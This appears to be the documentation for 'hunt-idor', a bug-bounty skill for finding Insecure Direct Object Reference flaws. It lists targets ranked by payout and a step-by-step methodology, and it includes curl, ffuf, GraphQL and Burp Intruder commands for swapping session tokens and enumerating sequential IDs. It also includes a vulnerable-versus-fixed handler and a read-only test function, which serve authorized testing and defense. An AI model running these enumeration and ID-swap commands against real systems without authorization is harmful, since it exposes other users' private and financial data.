# hunt-idor
Hunt-idor is a reconnaissance and exploitation skill for identifying Insecure Direct Object Reference vulnerabilities in web applications. Use this skill when testing APIs, web services, and multi-tenant platforms for authorization bypasses that expose user data, financial records, or administrative resources through predictable or sequential identifiers in URLs, GraphQL queries, or request parameters.
```bash
git clone --depth 1 https://github.com/elementalsouls/Claude-BugHunter /tmp/hunt-idor && cp -r /tmp/hunt-idor/skills/hunt-idor ~/.claude/skills/hunt-idor
```

## SKILL.md
## Crown Jewel Targets
**Why IDOR pays big:**
- Direct access to other users' data without authentication bypass — clear, demonstrable impact
- Chains easily with privilege escalation, financial fraud, and account takeover
- Affects virtually every application with user-owned resources
**Highest-value asset types (by payout potential):**
| Asset Type | Why It Pays |
|---|---|
| Financial documents / billing APIs | PII + financial data exposure (Shopify, Uber, PayPal) |
| Private repositories / source code | IP theft, critical data loss (GitHub) |
| User messages / DMs | Privacy violation at scale (Reddit) |
| Account management endpoints | User addition, deletion, privilege escalation (PayPal, Mozilla) |
| Business/org administration | Cross-tenant escalation, employee PII (Uber) |
| Content moderation/admin actions | Operational sabotage (Reddit mod logs) |
**Programs that pay most for IDOR:**
- Platforms with multi-tenancy (SaaS, B2B tools)
- Fintech and payment processors
- Social platforms with private content
- Developer tools with org/repo isolation
---
## Attack Surface Signals
**URL patterns that scream IDOR:**
```
/api/v1/users/{id}/
/api/v*/orders/{order_id}
/invoices/download?id=
/reports/{uuid}/
/messages/{thread_id}
/admin/orgs/{org_id}/members
/migration/{migration_id}/files
/graphql (query params with IDs)
/api/business/{business_id}/
/vouchers/{voucher_id}/policy
```
**Response header signals:**
- `Content-Type: application/json` on endpoints accepting raw IDs
- No `X-Frame-Options` or CORS misconfigs paired with ID params
- `Authorization: Bearer` tokens that are user-scoped but hit org-level resources
**JavaScript source patterns:**
```javascript
// Look for hardcoded or interpolated IDs in JS
fetch(`/api/v1/users/${userId}/profile`);
axios.get('/invoices/' + invoiceId);
// GraphQL operations embedded in bundles: query { billingDocument(id: $docId) }
// Redux/state stores exposing foreign IDs
state.currentUser.organizationId;
```
**Tech stack signals:**
- GraphQL endpoints (query-based IDORs are often missed)
- REST APIs with sequential integer IDs (most vulnerable)
- UUIDs that are predictable or leaked in other responses
- Multi-tenant SaaS apps with `org_id`, `account_id`, `business_id` params
- Mobile apps (Burp the APK — mobile APIs often skip authorization checks)
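The signals above all point at the same root cause: a handler that fetches an object by the raw identifier the client supplied and never ties the object back to the caller. The following is an added illustration, not code from the hunt-idor skill or from any program listed here: a hypothetical invoice lookup in its vulnerable form beside the object-level-authorization fix that scopes the lookup to the caller's tenant and ownership. The `session` dict, `Invoice` record and the sample data are all constructed for the example.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Invoice:
    id: int
    org_id: int
    owner_id: int
    amount: float

# Constructed sample data (hypothetical): two tenants, three invoices.
INVOICES = {
    12345: Invoice(12345, org_id=1, owner_id=100, amount=250.0),
    12346: Invoice(12346, org_id=1, owner_id=101, amount=80.0),
    12347: Invoice(12347, org_id=2, owner_id=200, amount=999.0),
}

class HttpError(Exception):
    def __init__(self, status):
        self.status = status

def get_invoice_vulnerable(session, invoice_id):
    # The IDOR: only "is the caller logged in?" is checked; the record
    # is fetched by raw id and never tied back to the caller.
    if session is None:
        raise HttpError(401)
    inv = INVOICES.get(invoice_id)
    if inv is None:
        raise HttpError(404)
    return inv

def get_invoice_fixed(session, invoice_id):
    # Object-level authorization: the lookup is scoped to the caller's tenant
    # and ownership (or an org-admin role). A foreign id gets the same 404 as
    # a missing one, so the endpoint is not an existence oracle either.
    if session is None:
        raise HttpError(401)
    inv = INVOICES.get(invoice_id)
    if inv is None or inv.org_id != session["org_id"]:
        raise HttpError(404)
    if inv.owner_id != session["user_id"] and session.get("role") != "org_admin":
        raise HttpError(404)
    return inv

def status_of(handler, session, invoice_id):
    # Exercise a handler the way the User A / User B differential does.
    try:
        handler(session, invoice_id)
        return 200
    except HttpError as err:
        return err.status
```

Note that switching to UUIDs would not change either handler's behaviour; only the ownership check in `get_invoice_fixed` closes the hole.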
---
## Step-by-Step Hunting Methodology
1. **Map all object references in the application**
   - Browse every feature authenticated as User A
   - Capture all requests in Burp Suite
   - Filter for requests containing: `id=`, `_id=`, `uuid=`, `/v1/{noun}/{id}`, query params with numeric/UUID values
2. **Enumerate ID types**
   - Sequential integers → enumerate ±1, ±100
   - UUIDs → check if they appear in other responses or JS files
   - Hashed IDs → check if leaked in public endpoints, metadata, or GraphQL introspection
3. **Create two separate accounts (same privilege level)**
   - User A: resource owner
   - User B: attacker account
   - Log all IDs belonging to User A while authenticated as User A
4. **Replay User A's resource IDs as User B**
   - Replace session cookie/token with User B's credentials
   - Send identical requests referencing User A's object IDs
   - Test ALL HTTP verbs: GET, POST, PUT, PATCH, DELETE on each endpoint
5. **Test cross-tenant/cross-org scenarios**
   - Create accounts in separate organizations/businesses
   - Test if Org B's session can reference Org A's IDs
   - Pay special attention to admin/management endpoints
6. **Test GraphQL specifically**
   - Run introspection: `{ __schema { queryType { fields { name } } } }`
   - For every query/mutation taking an `id` argument, substitute another user's ID
   - Test both queries (read) and mutations (write/delete)
7. **Test write/destructive operations, not just reads**
   - Can User B DELETE User A's resources?
   - Can User B MODIFY User A's content?
   - Can User B ADD themselves to User A's account?
8. **Chain IDORs together**
   - Use one IDOR's leaked data (org IDs, user IDs) to fuel the next
   - IDOR → leaked ID → second IDOR → privilege escalation
9. **Test state-changing edge cases**
   - Expired tokens/invites that can still be accepted
   - Race conditions on resource IDs
   - Indirect references: `?sort=id` or `?filter[user_id]=`
10. **Document the exact differential**
    - Confirm User B has NO legitimate access to User A's resource
    - Screenshot/log the 200 OK vs expected 403/404
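Steps 3, 4 and 10 together describe a read-only differential: every object User A can read is replayed with User B's credentials, and a finding is recorded only when the owner baseline succeeded and the non-owner also got 2xx. The block below is an added example of that check written as a reusable function (it is not part of the hunt-idor skill), the shape one would keep as an authorization regression test against in-scope, authorised targets. The `fetch` callable is injectable so the logic can be exercised offline against a stub; the `http_fetch` default uses only the standard library.

```python
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple

# fetch(method, url, headers) -> (status, body). Injectable so the check can run
# against a stub (as in the test) as well as a live, in-scope application.
Fetch = Callable[[str, str, Dict[str, str]], Tuple[int, str]]

def http_fetch(method: str, url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    req = urllib.request.Request(url, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.getcode(), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")

def idor_differential(owner_urls: Iterable[str], owner_headers: Dict[str, str],
                      other_headers: Dict[str, str], fetch: Fetch = http_fetch) -> List[dict]:
    """Read-only differential: each URL User A can read is replayed with User B's
    credentials. A finding needs both A's baseline and B's replay to be 2xx; an
    identical body makes the differential unambiguous for the report."""
    findings = []
    for url in owner_urls:
        status_a, body_a = fetch("GET", url, owner_headers)
        if not 200 <= status_a < 300:
            continue  # no valid baseline as the owner; nothing to compare
        status_b, body_b = fetch("GET", url, other_headers)
        if 200 <= status_b < 300:
            findings.append({"url": url, "status_a": status_a, "status_b": status_b,
                             "identical_body": body_a == body_b})
    return findings

def render(findings: List[dict]) -> str:
    # One line per finding, in the "200 vs expected 403/404" form step 10 asks for.
    lines = [f"{f['url']}: owner {f['status_a']}, non-owner {f['status_b']}"
             + (" (identical body)" if f["identical_body"] else "") for f in findings]
    return "\n".join(lines) if lines else "no IDOR differential found"
```

Only GET is replayed here on purpose; the write and delete verbs from step 4 belong in a separate run against disposable test data.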
---
## Payload & Detection Patterns
**Basic IDOR test with curl (swap cookie/token):**
```bash
# Get User A's resource ID while authenticated as A
curl -s -H "Cookie: session=USER_A_SESSION" \
  https://target.com/api/v1/invoices/12345
# Replay with User B's session
curl -s -H "Cookie: session=USER_B_SESSION" \
  https://target.com/api/v1/invoices/12345
# Success = 200 OK with User A's data
```
**GraphQL IDOR test:**
```bash
curl -s -X POST https://target.com/graphql \
  -H "Authorization: Bearer USER_B_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"query":"{ billingDocument(id: \"USER_A_DOC_ID\") { id amount pdfUrl } }"}'
```
**Enumerate sequential IDs with ffuf:**
```bash
ffuf -u "https://target.com/api/v1/orders/FUZZ" \
  -w ids.txt \
  -H "Authorization: Bearer USER_B_TOKEN" \
  -mc 200 \
  -o idor_results.json
```
**Generate sequential ID wordlist:**
```python
# Generate IDs around a known value (±500) for the ffuf run above
known_id = 48291
with open("ids.txt", "w") as f:
    for i in range(known_id - 500, known_id + 500):
        f.write(str(i) + "\n")
```
**Burp Intruder payload for IDOR scanning:**
```
GET /api/messages/§12345§ HTTP/1.1
Host: target.com
Authorization: Bearer USER_B_TOKEN
# Mark §12345§ as injection point
# Use numeric sequential payload: 12000-13000
# Filter responses by length difference or status 200
```
**JavaScript scraping for leaked IDs:**
```bash
# Find IDs in JS bundles
curl -s https://target.com/static/app.js | grep -Eo '"id":"[a-f0-9-]{36}"' | sort -u
# Find object references in API responses
curl -s -H "Cookie: session=USER_A_SESSION" https://target.com/api/v1/invoices/12345 \
  | grep -Eo '"[a-z_]*id":"?[A-Za-z0-9-]+"?' | sort -u
```